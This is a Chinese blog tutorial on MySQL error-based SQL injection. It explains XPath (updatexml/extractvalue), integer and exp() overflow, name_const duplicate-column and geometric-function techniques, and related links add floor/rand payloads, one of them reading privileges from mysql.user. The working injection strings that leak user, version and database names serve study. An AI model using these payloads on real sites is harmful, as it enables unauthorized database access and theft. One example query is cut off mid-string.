mysql注入原理_Mysql报错注入原理分析

最新推荐文章于 2024-04-27 15:01:59 发布
最新推荐文章于 2024-04-27 15:01:59 发布
阅读量431 收藏 1
点赞数
文章标签: mysql注入原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33756596/article/details/113201781
版权

2ff34e647e2e3cdfd8dca593e17d9b0a.png

报错类型Duplicate entry报错:多次查询插入重复键值导致count报错从而在报错信息中带入了敏感信息。

Xpath报错:从mysql5.1.5开始提供两个XML查询和修改的函数,语法错误导致查询结果出现在报错信息里

数据溢出报错:整形溢出,双精度溢出

数据重复报错:列名重复

其余报错(几何函数)

基于count(),rand(),group by()的报错注入原理分析[转]

利用Duplicate entry报错实现

73707e72c78b6b54d62ae853c8d6fb64.png

Xpath报错

从mysql5.1.5开始提供两个XML查询和修改的函数,extractvalue和updatexml。updatexml():更新xml文档的函数 语法:updatexml(目标xml文档,xml路径,更新的内容)

extractvalue():对XML文档进行查询的函数 语法:extractvalue(目标xml文档,xml路径)

xml路径格式为/xxx/xx/xx/xx ,即使查询不到也不会报错,但如果写入其他格式就会报错,并且会返回我们写入的非法格式内容,这个非法的内容就是我们想要查询的内容。并且xml路径使用concat()拼接 ‘ / ‘ 效果相同。

注意:extractvalue和updatexml能查询字符串的最大长度为32,就是说如果我们想要的结果超过32,就需要用substr()函数截取,一次查看32位

查询前5位示例:1select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘1

2and updatexml(1,concat(0x26,(version()),0x26),1);

and (extractvalue(1,concat(0x26,(version()),0x26)));

数据溢出TypeStorageMinimum ValueMaximum Value(Bytes)(Signed/Unsigned)(Signed/Unsigned)

TINYINT1-128127

0255

SMALLINT2-3276832767

065535

MEDIUMINT3-83886088388607

016777215

INT4-21474836482147483647

04294967295

BIGINT8-92233720368547758089223372036854775807

018446744073709551615

在mysql5.5之前,整形溢出是不会报错的,根据官方文档说明out-of-range-and-overflow,只有版本号大于5.5.5时,才会报错。试着对最大数做加法运算,可以看到报错的具体情况:1

2mysql> select 18446744073709551615+1;

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551615 + 1)'

在mysql中,要使用这么大的数,并不需要输入这么长的数字进去,使用按位取反运算运算即可:1

2

3

4

5

6

7

8

9

10mysql> select ~0;

+----------------------+

| ~0 |

+----------------------+

| 18446744073709551615 |

+----------------------+

1 row in set (0.00 sec)

mysql> select ~0+1;

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(~(0) + 1)'

我们知道,如果一个查询成功返回,则其返回值为0,进行逻辑非运算后可得1,这个值是可以进行数学运算的:1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23mysql> select (select * from (select user())x);

+----------------------------------+

| (select * from (select user())x) |

+----------------------------------+

+----------------------------------+

1 row in set (0.00 sec)

mysql> select !(select * from (select user())x);

+-----------------------------------+

| !(select * from (select user())x) |

+-----------------------------------+

| 1 |

+-----------------------------------+

1 row in set (0.01 sec)

mysql> select !(select * from (select user())x)+1;

+-------------------------------------+

| !(select * from (select user())x)+1 |

+-------------------------------------+

| 2 |

+-------------------------------------+

1 row in set (0.00 sec)

将0按位取反就会返回“18446744073709551615”,而函数执行成功会返回0,所以将成功执行的函数取反就会得到最大的无符号BIGINT值,从而造成报错。

同理,利用exp函数也会产生类似的溢出错误:1

2

3

4

5

6

7

8

9

10mysql> select exp(709);

+-----------------------+

| exp(709) |

+-----------------------+

| 8.218407461554972e307 |

+-----------------------+

1 row in set (0.00 sec)

mysql> select exp(710);

ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

Exp()超过710会产生溢出。1

2select exp(~(select * from(select user())x));

and (exp(~(select * from(select version())a)));

整型溢出:1

2select ~0+!(select * from (select user())x);

select ( select ( !x - ~0 ) from ( select ( select user())x)a);

在mysql5.5.47可以在报错中返回查询结果:1

2mysql> select (select(!x-~0)from(select(select user())x)a);

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('[email protected]')) - ~(0))'

而在mysql>5.5.53时,则不能返回查询结果1

2mysql> select (select(!x-~0)from(select(select user())x)a);

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not(`a`.`x`)) - ~(0))'

此外,报错信息是有长度限制的,在mysql/my_error.c中可以看到:1

2

3

4/* Max length of a error message. Should be

kept in sync with MYSQL_ERRMSG_SIZE. */

#define ERRMSGSIZE (512)

列名重复

mysql列名重复会报错,我们利用name_const来制造一个列:1

2

3

4

5

6

7mysql> select name_const(version(),1);

+--------+

| 5.7.20 |

+--------+

| 1 |

+--------+

1 row in set (0.00 sec)

构造重复的列:1select * from (select name_const(version(),1),name_const(version(),1))a;

高版本mysql修复了这个问题,要求第一个参数必须为常量,所以我们只能去查询user(),version()一些系统常量。

但在低版本中(Mysql 5.0.12 <= 版本 <= Mysql 5.0.51),可以成功利用。1select * from (select name_const((select database()),1),name_const((select database()),1))a;

利用join()函数可以用来爆列名:1

2

3

4

5

6mysql> select * from(select * from users a join users b)c;

ERROR 1060 (42S21): Duplicate column name 'id'

mysql> select * from(select * from users a join users b using(id))c;

ERROR 1060 (42S21): Duplicate column name 'username'

mysql> select * from(select * from users a join users b using(id, username))c;

ERROR 1060 (42S21): Duplicate column name 'password'

其余报错

几何函数

mysql有些几何函数,例如geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring(),这些函数对参数要求是形如(1 2,3 3,2 2 1)这样几何数据,如果不满足要求,则会报错。经测试,在版本号为5.5.47上可以用来注入,而在5.7.17上则不行,不同的函数情况版本情况可能不一样:

geometrycollection():

GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。对GeometryCollection的元素无任何限制。攻击载荷查询的为一串字符,然后用处理geometrycollection(),由于MYSQL无法用这样字符串画出图形,所以报错了。1

2

3mysql> select geometrycollection((select * from(select * from(select user())a)b));

ERROR 1367 (22007): Illegal non geometric '(select `b`.`user()` from (select AS `user()` from dual) `b`)' value found during parsing

multipoint():

MultiPoint是一种由Point元素构成的几何对象集合。这些点未以任何方式连接或排序。1

2

3mysql> select multipoint((select * from(select * from(select database())a)b));

ERROR 1367 (22007): Illegal non geometric '(select `b`.`database()` from (select 'security' AS `database()` from dual) `b`)' value found during parsing

其余用法同geometrycollection()。

polygon():

Polygon是代表多边几何对象的平面Surface。它由单个外部边界以及0或多个内部边界定义,其中,每个内部边界定义为Polygon中的1个孔。1

2

3mysql> select polygon((select * from(select * from(select user())a)b));

ERROR 1367 (22007): Illegal non geometric '(select `b`.`user()` from (select AS `user()` from dual) `b`)' value found during parsing

其余用法同geometrycollection()。

multipolygon():

multipolygon()是一种由Polygon元素构成的几何对象集合。1

2

3mysql> select multipolygon((select * from(select * from(select user())a)b));

ERROR 1367 (22007): Illegal non geometric '(select `b`.`user()` from (select AS `user()` from dual) `b`)' value found during parsing

其余用法同geometrycollection()。

LineString():

LineString()是具有点之间线性内插特性的Curve。1

2

3mysql> select linestring((select * from(select * from(select user())a)b));

ERROR 1367 (22007): Illegal non geometric '(select `b`.`user()` from (select AS `user()` from dual) `b`)' value found during parsing

其余用法同geometrycollection()。

multilinestring():

参考

徐德民
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全:SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 2442
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
Mysql Geometric error-based
cnbird's blog
12-04 2670
mysql>SELECT GeometryCollection((select*from(select*from(select group_concat(user,file_priv) from mysql.user)f)x));  Error 1367 (22007): Illegal non geometric '(select `x`.`group_concat(user,file_p
报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例
最新发布
2401_84266286的博客
04-27 1049
适用情况:页面有数据库的报错信息报错信息必须是动态的、来自数据库的报错信息。网站写死的、自定义的报错提示不算。
Java java.sql.SQLSyntaxErrorException:Duplicate column name ‘xxx‘问题解决
旭东怪的博客
09-25 6241
问题描述: java.sql.SQLSyntaxErrorException: Duplicate column name 'username'; bad SQL grammar []; 问题分析: 1、建表语句中设置索引的字段出现了两个username。 CREATE TABLE users( `username` varchar(20) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT
解决 duplicate column name
热门推荐
weixin_44081211的博客
05-25 2万+
duplicate column name ,列名重复。 原因: 1.有重复的列 解决: 1.删除其中一个列
SQL Injection with MySQL 注入分析
09-14
总之,理解SQL注入原理和机制对于保护Web应用程序至关重要。开发人员应始终关注代码的安全性,避免因疏忽而使应用程序成为潜在的目标。同时,定期进行安全审计和更新安全策略也是防范SQL注入的关键。
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
PHP+MYSQL 注入靶场
04-26
**PHP+MYSQL 注入靶场**是一个用于学习和实践**SQL注入**的平台,它包含相关的源代码,有助于用户深入理解漏洞的原理。通过这个靶场,你可以模拟真实环境下的安全测试,提升对SQL注入攻击的防御能力。下面将详细阐述...
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
mysql报错注入原理_MySQL 常用报错注入原理分析
weixin_32068473的博客
01-28 352
简介这段时间学习SQL盲注中的报错注入,发现语句就是那么两句,但是一直不知道报错原因,所以看着别人的帖子学习一番,小本本记下来(1) count() , rand() , group by1.报错语句构造先直接上两个网上经常使用的报错语句,主要分析第一条,第二条是简化后的select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,flo...
【错误】添加重复列名后的报错(Error 1060(42S21))
陶洲川的博客
02-22 7596
添加重复列名后的报错(Duplicate column name),error 1060 (42S21)
mysql报错注入原理,MySQL报错注入
weixin_42416926的博客
03-24 370
什么是报错注入SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果可以出现在错误信息中。我一位好友的博客写过一个SQL注入的专栏,除了报错注入以外,别的类型也写了,而且比较详细,我个人比较推荐阅读。数据溢出报错在某些版本中,可以通过exp函数的特性结合整数溢出的报错进行注入,比如这样select (select(!x-~0)from(select(select user())x...
MySQL常见十种报错注入
weixin_52501704的博客
09-28 4046
MySQL常见十种报错注入
SQL注入 | exp()函数报错
JacobTsang的博客
10-30 6154
0x01原理 当传递一个大于709的值时,函数exp()就会引起一个溢出错误。 mysql&gt; select exp(709); +-----------------------+ | exp(709) | +-----------------------+ | 8.218407461554972e307 | +-----------------------+ 1 r...
Mysql 报错注入原理探索
代码析构师的专栏
02-09 2784
我们一般使用的报错语句: 1 select count(*),concat((select version()),floor(rand()*2))a from information_schema.tables group by a; concat:为聚合函数,连接字符串功能 foolr:取float的整数值 rand:取0~1之间随机浮点值,长度测试大概为16-19的样子,官方
mysql报错注入(显错注入)整理
Master'Blog
11-02 1810
1、通过floor暴错 /*数据库版本*/ and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_s
十种MySQL报错注入
BAM9090的博客
09-28 553
以下均摘自《代码审计:企业级Web代码安全架构》一书 1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extrac...
mysql提示caching_sha2_password报错
04-01
CREATE USER 'user'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password'; ``` 2. 升级客户端 升级客户端到支持caching_sha2_password身份验证插件的版本,例如MySQL 8.0.4以上版本或者MySQL ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值